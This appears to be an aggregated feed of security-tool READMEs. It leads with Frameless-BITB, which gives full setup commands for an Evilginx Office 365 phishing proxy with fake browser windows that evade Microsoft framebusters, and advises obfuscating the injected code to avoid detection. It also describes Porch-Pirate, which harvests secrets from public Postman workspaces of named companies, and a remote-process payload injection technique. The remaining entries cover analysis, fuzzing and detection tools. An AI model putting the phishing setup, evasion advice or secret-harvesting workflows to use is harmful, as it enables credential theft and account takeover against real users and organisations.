Reading view

There are new articles available, click to refresh the page.

Frameless-Bitb - A New Approach To Browser In The Browser (BITB) Without The Use Of Iframes, Allowing The Bypass Of Traditional Framebusters Implemented By Login Pages Like Microsoft And The Use With Evilginx


A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft.

This POC code is built for using this new BITB with Evilginx, and a Microsoft Enterprise phishlet.


Before diving deep into this, I recommend that you first check my talk at BSides 2023, where I first introduced this concept along with important details on how to craft the "perfect" phishing attack. ▶ Watch Video

☕︎ Buy Me A Coffee

Video Tutorial: 👇

Disclaimer

This tool is for educational and research purposes only. It demonstrates a non-iframe based Browser In The Browser (BITB) method. The author is not responsible for any misuse. Use this tool only legally and ethically, in controlled environments for cybersecurity defense testing. By using this tool, you agree to do so responsibly and at your own risk.

Backstory - The Why

Over the past year, I've been experimenting with different tricks to craft the "perfect" phishing attack. The typical "red flags" people are trained to look for are things like urgency, threats, authority, poor grammar, etc. The next best thing people nowadays check is the link/URL of the website they are interacting with, and they tend to get very conscious the moment they are asked to enter sensitive credentials like emails and passwords.

That's where Browser In The Browser (BITB) came into play. Originally introduced by @mrd0x, BITB is a concept of creating the appearance of a believable browser window inside of which the attacker controls the content (by serving the malicious website inside an iframe). However, the fake URL bar of the fake browser window is set to the legitimate site the user would expect. This combined with a tool like Evilginx becomes the perfect recipe for a believable phishing attack.

The problem is that over the past months/years, major websites like Microsoft implemented various little tricks called "framebusters/framekillers" which mainly attempt to break iframes that might be used to serve the proxied website like in the case of Evilginx.

In short, Evilginx + BITB for websites like Microsoft no longer works. At least not with a BITB that relies on iframes.

The What

A Browser In The Browser (BITB) without any iframes! As simple as that.

Meaning that we can now use BITB with Evilginx on websites like Microsoft.

Evilginx here is just a strong example, but the same concept can be used for other use-cases as well.

The How

Framebusters target iframes specifically, so the idea is to create the BITB effect without the use of iframes, and without disrupting the original structure/content of the proxied page. This can be achieved by injecting scripts and HTML besides the original content using search and replace (aka substitutions), then relying completely on HTML/CSS/JS tricks to make the visual effect. We also use an additional trick called "Shadow DOM" in HTML to place the content of the landing page (background) in such a way that it does not interfere with the proxied content, allowing us to flexibly use any landing page with minor additional JS scripts.

Instructions

Video Tutorial


Local VM:

Create a local Linux VM. (I personally use Ubuntu 22 on VMWare Player or Parallels Desktop)

Update and Upgrade system packages:

sudo apt update && sudo apt upgrade -y

Evilginx Setup:

Optional:

Create a new evilginx user, and add user to sudo group:

sudo su

adduser evilginx

usermod -aG sudo evilginx

Test that evilginx user is in sudo group:

su - evilginx

sudo ls -la /root

Navigate to users home dir:

cd /home/evilginx

(You can do everything as sudo user as well since we're running everything locally)

Setting Up Evilginx

Download and build Evilginx: Official Docs

Copy Evilginx files to /home/evilginx

Install Go: Official Docs

wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
nano ~/.profile

ADD: export PATH=$PATH:/usr/local/go/bin

source ~/.profile

Check:

go version

Install make:

sudo apt install make

Build Evilginx:

cd /home/evilginx/evilginx2
make

Create a new directory for our evilginx build along with phishlets and redirectors:

mkdir /home/evilginx/evilginx

Copy build, phishlets, and redirectors:

cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx

cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors

cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets

Ubuntu firewall quick fix (thanks to @kgretzky)

sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx

On Ubuntu, if you get Failed to start nameserver on: :53 error, try modifying this file

sudo nano /etc/systemd/resolved.conf

edit/add the DNSStubListener to no > DNSStubListener=no

then

sudo systemctl restart systemd-resolved

Modify Evilginx Configurations:

Since we will be using Apache2 in front of Evilginx, we need to make Evilginx listen to a different port than 443.

nano ~/.evilginx/config.json

CHANGE https_port from 443 to 8443

Install Apache2 and Enable Mods:

Install Apache2:

sudo apt install apache2 -y

Enable Apache2 mods that will be used: (We are also disabling access_compat module as it sometimes causes issues)

sudo a2enmod proxy
sudo a2enmod proxy_http
sudo a2enmod proxy_balancer
sudo a2enmod lbmethod_byrequests
sudo a2enmod env
sudo a2enmod include
sudo a2enmod setenvif
sudo a2enmod ssl
sudo a2ensite default-ssl
sudo a2enmod cache
sudo a2enmod substitute
sudo a2enmod headers
sudo a2enmod rewrite
sudo a2dismod access_compat

Start and enable Apache:

sudo systemctl start apache2
sudo systemctl enable apache2

Try if Apache and VM networking works by visiting the VM's IP from a browser on the host machine.

Clone this Repo:

Install git if not already available:

sudo apt -y install git

Clone this repo:

git clone https://github.com/waelmas/frameless-bitb
cd frameless-bitb

Apache Custom Pages:

Make directories for the pages we will be serving:

  • home: (Optional) Homepage (at base domain)
  • primary: Landing page (background)
  • secondary: BITB Window (foreground)
sudo mkdir /var/www/home
sudo mkdir /var/www/primary
sudo mkdir /var/www/secondary

Copy the directories for each page:


sudo cp -r ./pages/home/ /var/www/

sudo cp -r ./pages/primary/ /var/www/

sudo cp -r ./pages/secondary/ /var/www/

Optional: Remove the default Apache page (not used):

sudo rm -r /var/www/html/

Copy the O365 phishlet to phishlets directory:

sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml

Optional: To set the Calendly widget to use your account instead of the default I have inside, go to pages/primary/script.js and change the CALENDLY_PAGE_NAME and CALENDLY_EVENT_TYPE.

Note on Demo Obfuscation: As I explain in the walkthrough video, I included a minimal obfuscation for text content like URLs and titles of the BITB. You can open the demo obfuscator by opening demo-obfuscator.html in your browser. In a real-world scenario, I would highly recommend that you obfuscate larger chunks of the HTML code injected or use JS tricks to avoid being detected and flagged. The advanced version I am working on will use a combination of advanced tricks to make it nearly impossible for scanners to fingerprint/detect the BITB code, so stay tuned.

Self-signed SSL certificates:

Since we are running everything locally, we need to generate self-signed SSL certificates that will be used by Apache. Evilginx will not need the certs as we will be running it in developer mode.

We will use the domain fake.com which will point to our local VM. If you want to use a different domain, make sure to change the domain in all files (Apache conf files, JS files, etc.)

Create dir and parents if they do not exist:

sudo mkdir -p /etc/ssl/localcerts/fake.com/

Generate the SSL certs using the OpenSSL config file:

sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
-keyout /etc/ssl/localcerts/fake.com/privkey.pem -out /etc/ssl/localcerts/fake.com/fullchain.pem \
-config openssl-local.cnf

Modify private key permissions:

sudo chmod 600 /etc/ssl/localcerts/fake.com/privkey.pem

Apache Custom Configs:

Copy custom substitution files (the core of our approach):

sudo cp -r ./custom-subs /etc/apache2/custom-subs

Important Note: In this repo I have included 2 substitution configs for Chrome on Mac and Chrome on Windows BITB. Both have auto-detection and styling for light/dark mode and they should act as base templates to achieve the same for other browser/OS combos. Since I did not include automatic detection of the browser/OS combo used to visit our phishing page, you will have to use one of two or implement your own logic for automatic switching.

Both config files under /apache-configs/ are the same, only with a different Include directive used for the substitution file that will be included. (there are 2 references for each file)

# Uncomment the one you want and remember to restart Apache after any changes:
#Include /etc/apache2/custom-subs/win-chrome.conf
Include /etc/apache2/custom-subs/mac-chrome.conf

Simply to make it easier, I included both versions as separate files for this next step.

Windows/Chrome BITB:

sudo cp ./apache-configs/win-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

Mac/Chrome BITB:

sudo cp ./apache-configs/mac-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

Test Apache configs to ensure there are no errors:

sudo apache2ctl configtest

Restart Apache to apply changes:

sudo systemctl restart apache2

Modifying Hosts:

Get the IP of the VM using ifconfig and note it somewhere for the next step.

We now need to add new entries to our hosts file, to point the domain used in this demo fake.com and all used subdomains to our VM on which Apache and Evilginx are running.

On Windows:

Open Notepad as Administrator (Search > Notepad > Right-Click > Run as Administrator)

Click on the File option (top-left) and in the File Explorer address bar, copy and paste the following:

C:\Windows\System32\drivers\etc\

Change the file types (bottom-right) to "All files".

Double-click the file named hosts

On Mac:

Open a terminal and run the following:

sudo nano /private/etc/hosts

Now modify the following records (replace [IP] with the IP of your VM) then paste the records at the end of the hosts file:

# Local Apache and Evilginx Setup
[IP] login.fake.com
[IP] account.fake.com
[IP] sso.fake.com
[IP] www.fake.com
[IP] portal.fake.com
[IP] fake.com
# End of section

Save and exit.

Now restart your browser before moving to the next step.

Note: On Mac, use the following command to flush the DNS cache:

sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder

Important Note:

This demo is made with the provided Office 365 Enterprise phishlet. To get the host entries you need to add for a different phishlet, use phishlet get-hosts [PHISHLET_NAME] but remember to replace the 127.0.0.1 with the actual local IP of your VM.

Trusting the Self-Signed SSL Certs:

Since we are using self-signed SSL certificates, our browser will warn us every time we try to visit fake.com so we need to make our host machine trust the certificate authority that signed the SSL certs.

For this step, it's easier to follow the video instructions, but here is the gist anyway.

Open https://fake.com/ in your Chrome browser.

Ignore the Unsafe Site warning and proceed to the page.

Click the SSL icon > Details > Export Certificate IMPORTANT: When saving, the name MUST end with .crt for Windows to open it correctly.

Double-click it > install for current user. Do NOT select automatic, instead place the certificate in specific store: select "Trusted Route Certification Authorities".

On Mac: to install for current user only > select "Keychain: login" AND click on "View Certificates" > details > trust > Always trust

Now RESTART your Browser

You should be able to visit https://fake.com now and see the homepage without any SSL warnings.

Running Evilginx:

At this point, everything should be ready so we can go ahead and start Evilginx, set up the phishlet, create our lure, and test it.

Optional: Install tmux (to keep evilginx running even if the terminal session is closed. Mainly useful when running on remote VM.)

sudo apt install tmux -y

Start Evilginx in developer mode (using tmux to avoid losing the session):

tmux new-session -s evilginx
cd ~/evilginx/
./evilginx -developer

(To re-attach to the tmux session use tmux attach-session -t evilginx)

Evilginx Config:

config domain fake.com
config ipv4 127.0.0.1

IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting Apache since all requests will be coming from Apache and not the actual visitor IP.

blacklist noadd

Setup Phishlet and Lure:

phishlets hostname O365 fake.com
phishlets enable O365
lures create O365
lures get-url 0

Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests).

Useful Resources

Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB

Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery

My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg

How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation

Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/

TODO

  • Create script(s) to automate most of the steps


Toolkit - The Essential Toolkit For Reversing, Malware Analysis, And Cracking


This tool compilation is carefully crafted with the purpose of being useful both for the beginners and veterans from the malware analysis world. It has also proven useful for people trying their luck at the cracking underworld.

It's the ideal complement to be used with the manuals from the site, and to play with the numbered theories mirror.


Advantages

To be clear, this pack is thought to be the most complete and robust in existence. Some of the pros are:

  1. It contains all the basic (and not so basic) tools that you might need in a real life scenario, be it a simple or a complex one.

  2. The pack is integrated with an Universal Updater made by us from scratch. Thanks to that, we get to mantain all the tools in an automated fashion.

  3. It's really easy to expand and modify: you just have to update the file bin\updater\tools.ini to integrate the tools you use to the updater, and then add the links for your tools to bin\sendto\sendto, so they appear in the context menus.

  4. The installer sets up everything we might need automatically - everything, from the dependencies to the environment variables, and it can even add a scheduled task to update the whole pack of tools weekly.

Installation

  1. You can simply download the stable versions from the release section, where you can also find the installer.

  2. Once downloaded, you can update the tools with the Universal Updater that we specifically developed for that sole purpose.
    You will find the binary in the folder bin\updater\updater.exe.

Tool set

This toolkit is composed by 98 apps that cover everything we might need to perform reverse engineering and binary/malware analysis.
Every tool has been downloaded from their original/official websites, but we still recommend you to use them with caution, specially those tools whose official pages are forum threads. Always exercise common sense.
You can check the complete list of tools here.

About contributions

Pull Requests are welcome. If you'd want to propose big changes, you should first create an Issue about it, so we all can analyze and discuss it. The tools are compressed with 7-zip, and the format used for nomenclature is {name} - {version}.7z



Porch-Pirate - The Most Comprehensive Postman Recon / OSINT Client And Framework That Facilitates The Automated Discovery And Exploitation Of API Endpoints And Secrets Committed To Workspaces, Collections, Requests, Users And Teams


Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconaissance / OSINT framework for Postman. While existing tools are great proof of concepts, they only attempt to identify very specific keywords as "secrets", and in very limited locations, with no consideration to recon beyond secrets. We realized we required capabilities that were "secret-agnostic", and had enough flexibility to capture false-positives that still provided offensive value.

Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:

  • Workspaces
  • Collections
  • Requests
  • Users
  • Teams

Installation

python3 -m pip install porch-pirate

Using the client

The Porch Pirate client can be used to nearly fully conduct reviews on public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords to be used that can typically maximize results. These methodologies can be located on our blog: Plundering Postman with Porch Pirate.

Porch Pirate supports the following arguments to be performed on collections, workspaces, or users.

  • --globals
  • --collections
  • --requests
  • --urls
  • --dump
  • --raw
  • --curl

Simple Search

porch-pirate -s "coca-cola.com"

Get Workspace Globals

By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8

Dump Workspace

When an interesting result has been found with a simple search, we can provide the workspace ID to the -w argument with the --dump command to begin extracting information from the workspace and its collections.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump

Automatic Search and Globals Extraction

Porch Pirate can be supplied a simple search term, following the --globals argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.

porch-pirate -s "shopify" --globals

Automatic Search Dump

Porch Pirate can be supplied a simple search term, following the --dump argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.

porch-pirate -s "coca-cola.com" --dump

Extract URLs from Workspace

A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls

Automatic URL Extraction

Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.

porch-pirate -s "coca-cola.com" --urls

Show Collections in a Workspace

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections

Show Workspace Requests

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests

Show raw JSON

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw

Show Entity Information

porch-pirate -w WORKSPACE_ID
porch-pirate -c COLLECTION_ID
porch-pirate -r REQUEST_ID
porch-pirate -u USERNAME/TEAMNAME

Convert Request to Curl

Porch Pirate can build curl requests when provided with a request ID for easier testing.

porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl

Use a proxy

porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080

Using as a library

Searching

p = porchpirate()
print(p.search('coca-cola.com'))

Get Workspace Collections

p = porchpirate()
print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

Dumping a Workspace

p = porchpirate()
collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
for collection in collections['data']:
requests = collection['requests']
for r in requests:
request_data = p.request(r['id'])
print(request_data)

Grabbing a Workspace's Globals

p = porchpirate()
print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

Other Examples

Other library usage examples can be located in the examples directory, which contains the following examples:

  • dump_workspace.py
  • format_search_results.py
  • format_workspace_collections.py
  • format_workspace_globals.py
  • get_collection.py
  • get_collections.py
  • get_profile.py
  • get_request.py
  • get_statistics.py
  • get_team.py
  • get_user.py
  • get_workspace.py
  • recursive_globals_from_search.py
  • request_to_curl.py
  • search.py
  • search_by_page.py
  • workspace_collections.py


APKDeepLens - Android Security Insights In Full Spectrum


APKDeepLens is a Python based tool designed to scan Android applications (APK files) for security vulnerabilities. It specifically targets the OWASP Top 10 mobile vulnerabilities, providing an easy and efficient way for developers, penetration testers, and security researchers to assess the security posture of Android apps.


Features

APKDeepLens is a Python-based tool that performs various operations on APK files. Its main features include:

  • APK Analysis -> Scans Android application package (APK) files for security vulnerabilities.
  • OWASP Coverage -> Covers OWASP Top 10 vulnerabilities to ensure a comprehensive security assessment.
  • Advanced Detection -> Utilizes custom python code for APK file analysis and vulnerability detection.
  • Sensitive Information Extraction -> Identifies potential security risks by extracting sensitive information from APK files, such as insecure authentication/authorization keys and insecure request protocols.
  • In-depth Analysis -> Detects insecure data storage practices, including data related to the SD card, and highlights the use of insecure request protocols in the code.
  • Intent Filter Exploits -> Pinpoint vulnerabilities by analyzing intent filters extracted from AndroidManifest.xml.
  • Local File Vulnerability Detection -> Safeguard your app by identifying potential mishandlings related to local file operations
  • Report Generation -> Generates detailed and easy-to-understand reports for each scanned APK, providing actionable insights for developers.
  • CI/CD Integration -> Designed for easy integration into CI/CD pipelines, enabling automated security testing in development workflows.
  • User-Friendly Interface -> Color-coded terminal outputs make it easy to distinguish between different types of findings.

Installation

To use APKDeepLens, you'll need to have Python 3.8 or higher installed on your system. You can then install APKDeepLens using the following command:

For Linux

git clone https://github.com/d78ui98/APKDeepLens/tree/main
cd /APKDeepLens
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python APKDeepLens.py --help

For Windows

git clone https://github.com/d78ui98/APKDeepLens/tree/main
cd \APKDeepLens
python3 -m venv venv
.\venv\Scripts\activate
pip install -r .\requirements.txt
python APKDeepLens.py --help

Usage

To simply scan an APK, use the below command. Mention the apk file with -apk argument. Once the scan is complete, a detailed report will be displayed in the console.

python3 APKDeepLens.py -apk file.apk

If you've already extracted the source code and want to provide its path for a faster scan you can use the below command. Mention the source code of the android application with -source parameter.

python3 APKDeepLens.py -apk file.apk -source <source-code-path>

To generate detailed PDF and HTML reports after the scan you can pass -report argument as mentioned below.

python3 APKDeepLens.py -apk file.apk -report

Contributing

We welcome contributions to the APKDeepLens project. If you have a feature request, bug report, or proposal, please open a new issue here.

For those interested in contributing code, please follow the standard GitHub process. We'll review your contributions as quickly as possible :)

Featured at



RemoteTLSCallbackInjection - Utilizing TLS Callbacks To Execute A Payload Without Spawning Any Threads In A Remote Process


This method utilizes TLS callbacks to execute a payload without spawning any threads in a remote process. This method is inspired by Threadless Injection as RemoteTLSCallbackInjection does not invoke any API calls to trigger the injected payload.

Quick Links

Maldev Academy Home

Maldev Academy Syllabus

Related Maldev Academy Modules

New Module 34: TLS Callbacks For Anti-Debugging

New Module 35: Threadless Injection



Implementation Steps

The PoC follows these steps:

  1. Create a suspended process using the CreateProcessViaWinAPIsW function (i.e. RuntimeBroker.exe).
  2. Fetch the remote process image base address followed by reading the process's PE headers.
  3. Fetch an address to a TLS callback function.
  4. Patch a fixed shellcode (i.e. g_FixedShellcode) with runtime-retrieved values. This shellcode is responsible for restoring both original bytes and memory permission of the TLS callback function's address.
  5. Inject both shellcodes: g_FixedShellcode and the main payload.
  6. Patch the TLS callback function's address and replace it with the address of our injected payload.
  7. Resume process.

The g_FixedShellcode shellcode will then make sure that the main payload executes only once by restoring the original TLS callback's original address before calling the main payload. A TLS callback can execute multiple times across the lifespan of a process, therefore it is important to control the number of times the payload is triggered by restoring the original code path execution to the original TLS callback function.

Demo

The following image shows our implementation, RemoteTLSCallbackInjection.exe, spawning a cmd.exe as its main payload.



Sicat - The Useful Exploit Finder

Introduction

SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.

SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.


SiCat Resources

Installation

git clone https://github.com/justakazh/sicat.git && cd sicat

pip install -r requirements.txt

Usage


~$ python sicat.py --help

Command Line Options:

Command Description
-h Show help message and exit
-k KEYWORD
-kv KEYWORK_VERSION
-nm Identify via nmap output
--nvd Use NVD as info source
--packetstorm Use PacketStorm as info source
--exploitdb Use ExploitDB as info source
--exploitalert Use ExploitAlert as info source
--msfmoduke Use metasploit as info source
-o OUTPUT Path to save output to
-ot OUTPUT_TYPE Output file type: json or html

Examples

From keyword


python sicat.py -k telerik --exploitdb --msfmodule

From nmap output


nmap --open -sV localhost -oX nmap_out.xml
python sicat.py -nm nmap_out.xml --packetstorm

To-do

  • [ ] Input from nmap result from pipeline
  • [ ] Nmap multiple host support
  • [ ] Search NSE Script
  • [ ] Search by PORT

Contribution

I'm aware that perfection is elusive in coding. If you come across any bugs, feel free to contribute by fixing the code or suggesting new features. Your input is always welcomed and valued.



CloudGrappler - A purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure


Permiso: https://permiso.io
Read our release blog: https://permiso.io/blog/cloudgrappler-a-powerful-open-source-threat-detection-tool-for-cloud-environments

CloudGrappler is a purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure.


Notes

To optimize your utilization of CloudGrappler, we recommend using shorter time ranges when querying for results. This approach enhances efficiency and accelerates the retrieval of information, ensuring a more seamless experience with the tool.

Required Packages

bash pip3 install -r requirements.txt

Cloning cloudgrep locally

To clone the cloudgrep repository locally, run the clone.sh file. Alternatively, you can manually clone the repository into the same directory where CloudGrappler was cloned.

bash chmod +x clone.sh ./clone.sh

Input

This tool offers a CLI (Command Line Interface). As such, here we review its use:

Example 1 - Running the tool with default queries file

Define the scanning scope inside data_sources.json file based on your cloud infrastructure configuration. The following example showcases a structured data_sources.json file for both AWS and Azure environments:

Note

Modifying the source inside the queries.json file to a wildcard character (*) will scan the corresponding query across both AWS and Azure environments.

{
"AWS": [
{
"bucket": "cloudtrail-logs-00000000-ffffff",
"prefix": [
"testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03",
"testTrails/AWSLogs/00000000/CloudTrail/us-west-1/2024/03/04"
]
},
{
"bucket": "aws-kosova-us-east-1-00000000"
}

],
"AZURE": [
{
"accountname": "logs",
"container": [
"cloudgrappler"
]
}
]
}

Run command

python3 main.py

Example 2 - Permiso Intel Use Case

python3 main.py -p

[+] Running GetFileDownloadUrls.*secrets_ for AWS 
[+] Threat Actor: LUCR3
[+] Severity: MEDIUM
[+] Description: Review use of CloudShell. Permiso seldom witnesses use of CloudShell outside of known attackers.This however may be a part of your normal business use case.

Example 3 - Generate report

python3 main.py -p -jo

reports
└── json
├── AWS
│   └── 2024-03-04 01:01 AM
│   └── cloudtrail-logs-00000000-ffffff--
│   └── testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03
│   └── GetFileDownloadUrls.*secrets_.json
└── AZURE
└── 2024-03-04 01:01 AM
└── logs
└── cloudgrappler
└── okta_key.json

Example 4 - Filtering logs based on date or time

python3 main.py -p -sd 2024-02-15 -ed 2024-02-16

Example 5 - Manually adding queries and data source types

python3 main.py -q "GetFileDownloadUrls.*secret", "UpdateAccessKey" -s '*'

Example 6 - Running the tool with your own queries file

python3 main.py -f new_file.json

Running in your Cloud and Authentication cloudgrep

AWS

Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to configure the AWS CLI. If you are running on an EC2, an Instance Profile is likely the best choice.

If you run on an EC2 instance in the same region as the S3 bucket with a VPC endpoint for S3 you can avoid egress charges. You can authenticate in a number of ways.

Azure

The simplest way to authenticate with Azure is to first run:

az login

This will open a browser window and prompt you to login to Azure.



GDBFuzz - Fuzzing Embedded Systems Using Hardware Breakpoints


This is the companion code for the paper: 'Fuzzing Embedded Systems using Debugger Interfaces'. A preprint of the paper can be found here https://publications.cispa.saarland/3950/. The code allows the users to reproduce and extend the results reported in the paper. Please cite the above paper when reporting, reproducing or extending the results.


Folder structure

.
├── benchmark # Scripts to build Google's fuzzer test suite and run experiments
├── dependencies # Contains a Makefile to install dependencies for GDBFuzz
├── evaluation # Raw exeriment data, presented in the paper
├── example_firmware # Embedded example applications, used for the evaluation
├── example_programs # Contains a compiled example program and configs to test GDBFuzz
├── src # Contains the implementation of GDBFuzz
├── Dockerfile # For creating a Docker image with all GDBFuzz dependencies installed
├── LICENSE # License
├── Makefile # Makefile for creating the docker image or install GDBFuzz locally
└── README.md # This README file

Purpose of the project

The idea of GDBFuzz is to leverage hardware breakpoints from microcontrollers as feedback for coverage-guided fuzzing. Therefore, GDB is used as a generic interface to enable broad applicability. For binary analysis of the firmware, Ghidra is used. The code contains a benchmark setup for evaluating the method. Additionally, example firmware files are included.

Getting Started

GDBFuzz enables coverage-guided fuzzing for embedded systems, but - for evaluation purposes - can also fuzz arbitrary user applications. For fuzzing on microcontrollers we recommend a local installation of GDBFuzz to be able to send fuzz data to the device under test flawlessly.

Install local

GDBFuzz has been tested on Ubuntu 20.04 LTS and Raspberry Pie OS 32-bit. Prerequisites are java and python3. First, create a new virtual environment and install all dependencies.

virtualenv .venv
source .venv/bin/activate
make
chmod a+x ./src/GDBFuzz/main.py

Run locally on an example program

GDBFuzz reads settings from a config file with the following keys.

[SUT]
# Path to the binary file of the SUT.
# This can, for example, be an .elf file or a .bin file.
binary_file_path = <path>

# Address of the root node of the CFG.
# Breakpoints are placed at nodes of this CFG.
# e.g. 'LLVMFuzzerTestOneInput' or 'main'
entrypoint = <entrypoint>

# Number of inputs that must be executed without a breakpoint hit until
# breakpoints are rotated.
until_rotate_breakpoints = <number>


# Maximum number of breakpoints that can be placed at any given time.
max_breakpoints = <number>

# Blacklist functions that shall be ignored.
# ignore_functions is a space separated list of function names e.g. 'malloc free'.
ignore_functions = <space separated list>

# One of {Hardware, QEMU, SUTRunsOnHost}
# Hardware: An external component starts a gdb server and GDBFuzz can connect to this gdb server.
# QEMU: GDBFuzz starts QEMU. QEMU emulates binary_file_path and starts gdbserver.
# SUTRunsOnHost: GDBFuzz start the target program within GDB.
target_mode = <mode>

# Set this to False if you want to start ghidra, analyze the SUT,
# and start the ghidra bridge server manually.
start_ghidra = True


# Space separated list of addresses where software breakpoints (for error
# handling code) are set. Execution of those is considered a crash.
# Example: software_breakpoint_addresses = 0x123 0x432
software_breakpoint_addresses =


# Whether all triggered software breakpoints are considered as crash
consider_sw_breakpoint_as_error = False

[SUTConnection]
# The class 'SUT_connection_class' in file 'SUT_connection_path' implements
# how inputs are sent to the SUT.
# Inputs can, for example, be sent over Wi-Fi, Serial, Bluetooth, ...
# This class must inherit from ./connections/SUTConnection.py.
# See ./connections/SUTConnection.py for more information.
SUT_connection_file = FIFOConnection.py

[GDB]
path_to_gdb = gdb-multiarch
#Written in address:port
gdb_server_address = localhost:4242

[Fuzzer]
# In Bytes
maximum_input_length = 100000
# In seconds
single_run_timeout = 20
# In seconds
total_runtime = 3600

# Optional
# Path to a directory where each file contains one seed. If you don't want to
# use seeds, leave the value empty.
seeds_directory =

[BreakpointStrategy]
# Strategies to choose basic blocks are located in
# 'src/GDBFuzz/breakpoint_strategies/'
# For the paper we use the following strategies
# 'RandomBasicBlockStrategy.py' - Randomly choosing unreached basic blocks
# 'RandomBasicBlockNoDomStrategy.py' - Like previous, but doesn't use dominance relations to derive transitively reached nodes.
# 'RandomBasicBlockNoCorpusStrategy.py' - Like first, but prevents growing the input corpus and therefore behaves like blackbox fuzzing with coverage measurement.
# 'BlackboxStrategy.py', - Doesn't set any breakpoints
breakpoint_strategy_file = RandomBasicBlockStrategy.py

[Dependencies]
path_to_qemu = dependencies/qemu/build/x86_64-linux-user/qemu-x86_64
path_to_ghidra = dependencies/ghidra


[LogsAndVisualizations]
# One of {DEBUG, INFO, WARNING, ERROR, CRITICAL}
loglevel = INFO

# Path to a directory where output files (e.g. graphs, logfiles) are stored.
output_directory = ./output

# If set to True, an MQTT client sends UI elements (e.g. graphs)
enable_UI = False

An example config file is located in ./example_programs/ together with an example program that was compiled using our fuzzing harness in benchmark/benchSUTs/GDBFuzz_wrapper/common/. Start fuzzing for one hour with the following command.

chmod a+x ./example_programs/json-2017-02-12
./src/GDBFuzz/main.py --config ./example_programs/fuzz_json.cfg

We first see output from Ghidra analyzing the binary executable and susequently messages when breakpoints are relocated or hit.

Fuzzing Output

Depending on the specified output_directory in the config file, there should now be a folder trial-0 with the following structure

.
├── corpus # A folder that contains the input corpus.
├── crashes # A folder that contains crashing inputs - if any.
├── cfg # The control flow graph as adjacency list.
├── fuzzer_stats # Statistics of the fuzzing campaign.
├── plot_data # Table showing at which relative time in the fuzzing campaign which basic block was reached.
├── reverse_cfg # The reverse control flow graph.

Using Ghidra in GUI mode

By setting start_ghidra = False in the config file, GDBFuzz connects to a Ghidra instance running in GUI mode. Therefore, the ghidra_bridge plugin needs to be started manually from the script manager. During fuzzing, reached program blocks are highlighted in green.

GDBFuzz on Linux user programs

For fuzzing on Linux user applications, GDBFuzz leverages the standard LLVMFuzzOneInput entrypoint that is used by almost all fuzzers like AFL, AFL++, libFuzzer,.... In benchmark/benchSUTs/GDBFuzz_wrapper/common There is a wrapper that can be used to compile any compliant fuzz harness into a standalone program that fetches input via a named pipe at /tmp/fromGDBFuzz. This allows to simulate an embedded device that consumes data via a well defined input interface and therefore run GDBFuzz on any application. For convenience we created a script in benchmark/benchSUTs that compiles all programs from our evaluation with our wrapper as explained later.

NOTE: GDBFuzz is not intended to fuzz Linux user applications. Use AFL++ or other fuzzers therefore. The wrapper just exists for evaluation purposes to enable running benchmarks and comparisons on a scale!

Install and run in a Docker container

